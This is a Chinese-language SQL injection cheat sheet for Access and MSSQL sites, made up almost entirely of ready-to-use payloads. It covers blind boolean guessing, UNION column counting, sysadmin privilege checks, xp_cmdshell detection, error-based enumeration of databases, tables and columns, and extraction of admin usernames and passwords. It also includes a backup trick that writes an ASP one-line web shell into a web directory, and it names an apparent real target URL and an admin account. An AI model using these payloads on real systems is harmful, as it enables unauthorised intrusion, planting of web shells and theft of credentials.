通用查询
and (select count(*) from 表名)>=0
and (select count(字段名) from 表名)>=0
猜字段值长度
and (select top 1 len(字段名) from 表名)>1
and (select top 1 len(字段名) from 表名)>n-1 正常
and (select top 1 len(字段名) from 表名)>n 出错
说明字段长度为n
猜字段值内容
and (select top 1 asc(mid(字段名,1,1)) from 表名)>1
and (select top 1 asc(mid(字段名,1,1)) from 表名)=97
字段值内容的第一个值为a (a的编码是97)
and (select top 1 asc(mid(字段名,2,1)) from 表名)>1
and (select top 1 asc(mid(字段名,2,1)) from 表名)=98
字段值内容的第二个值为b (b的编码是98)
...
...
以此类推...
有时候可能 帐号是汉字的话 只需将与汉字的ascii值比较即可
联合查询
首先判断是否存在注入
之后 order by 长度 http://www.ename.cn/DomainFind.asp?id=2356
order by 8 正常
order by 9 出错
字段数目为 8个
之后
union select 1,2,3,4,5,6,7,8 from 表名
爆出数字 3、7
union select 1,2,字段名1,4,5,6,字段名2,8 from 表名
and user>0 出错提示类型不匹配 -- mssql数据库
and (select count(*) from sysobjects)>=0
正常 -- mssql数据库
sysobjects 是 mssql系统表
msysobjects 是 access系统表
之后判断权限
and 1=(select is_srvrolemember('sysadmin')) 正常sa权限
and 1=(select is_srvrolemember('db_owner')) db权限
and 1=(select is_srvrolemember('public')) public权限
sa权限的话
and 1=(Select count(*) FROM master.dbo.sysobjects Where xtype = 'X' AND name = 'xp_cmdshell') //判断XP_CMDSHELL是否存在
and 1=(select count(*) FROM master.dbo.sysobjects where name= 'xp_regread') //查看XP_regread扩展存储过程是不是已经被删除
1.
;backup database 数据库名 to disk='c:\db.bak'--
2.
;create table cmd(cmd image)--
3.
;insert into cmd(cmd) values ('<%%25eval(request("a")):response.end%%25>')--
4.
;backup database 数据库名 to disk='D:\www_web\aaa.asp' WITH DIFFERENTIAL FORMAT--
5.
;drop table cmd--
一句话转换成十六进制成功率会比较高,其他的换成16位进制编码也可以
mssql having 1=1-- 暴库注入
having 1=1-- 会爆出表名等等内容 如果权限不足的情况下可以爆库注入
group by 字段名1 having 1=1--
group by 字段名1,字段名2 having 1=1--
group by 字段名1,字段名2,...,字段名n having 1=1--
之后
union select 1,字段名1,字段名2,4.5.6.7 from 表名
order by 与数据类型转换爆错法
方法1:
and db_name()=0--
and db_name(n)>0-- 获得所有数据库名
方法2:
and 1=(select name from master.dbo.sysdatabases where dbid=1)--
and 1=(select name from master.dbo.sysdatabases where dbid=2)--
...
and 1=(select name from master.dbo.sysdatabases where dbid=n)--
爆当前数据库里面的表名
and (select top 1 name from (select top 1 name from sysobjects where xtype=0x75 order by name) t order by name desc)=0
and (select top 1 name from (select top 2 name from sysobjects where xtype=0x75 order by name) t order by name desc)=0
...
and (select top 1 name from (select top n name from sysobjects where xtype=0x75 order by name) t order by name desc)=0
爆出表名为 adminmaster
之后爆字段
and (select col_name(object_id('adminmaster'),1))=0
and (select col_name(object_id('adminmaster'),2))=0
爆出username password
爆内容
and (select top 1 username from adminmaster)>0 爆出keio用户
之后继续爆其他的用户名
and (select top 1 username from adminmaster where username<>'keio')>0
之后依此类推
确认数据类型联合查询
and 1=2 union all select 1,null,null,null,null,null,null,null,null,null,null,null from sysobjects--
and 1=2 union all select 1,2,3,'null',5,6,7,8,9 from sysobjects--
查数据库
and 1=2 union all select 1,2,3,(select name from master.dbo.sysdatabases where dbid=1),5,6,7,8,9 from sysobjects--
and 1=2 union all select 1,2,3,(select name from master.dbo.sysdatabases where dbid=2),5,6,7,8,9 from sysobjects--
...
查表
and 1=2 union all select 1,2,3, (select top 1 name from (select top 1 name from sysobjects where xtype=0x75 order by name) t order by name desc)
,5,6,7,8,9 from sysobjects--
and 1=2 union all select 1,2,3, (select top 1 name from (select top 2 name from sysobjects where xtype=0x75 order by name) t order by name desc)
,5,6,7,8,9 from sysobjects--
...
表名 若为 adminmaster
查字段名
and 1=2 union all select 1,2,3,(select col_name(object_id('adminmaster'),1)),5,6,7,8,9 from sysobjects--
and 1=2 union all select 1,2,3,(select col_name(object_id('adminmaster'),2)),5,6,7,8,9 from sysobjects--
...
and 1=2 union all select 1,2,3,(select col_name(object_id('adminmaster'),n)),5,6,7,8,9 from sysobjects--
若字段名为username password
爆字段内容
and 1=2 union all select 1,2,3,(select top 1 username from adminmaster ),5,6,7,8,9 from sysobjects-- keio
爆字段内容
and 1=2 union all select 1,2,3,(select password from adminmaster where username='keio'),5,6,7,8,9 from sysobjects--
得到第一个用户keio的密码
爆第二用户
and 1=2 union all select 1,2,3,(select top 1 username from adminmaster where username<>'keio'),5,6,7,8,9 from sysobjects--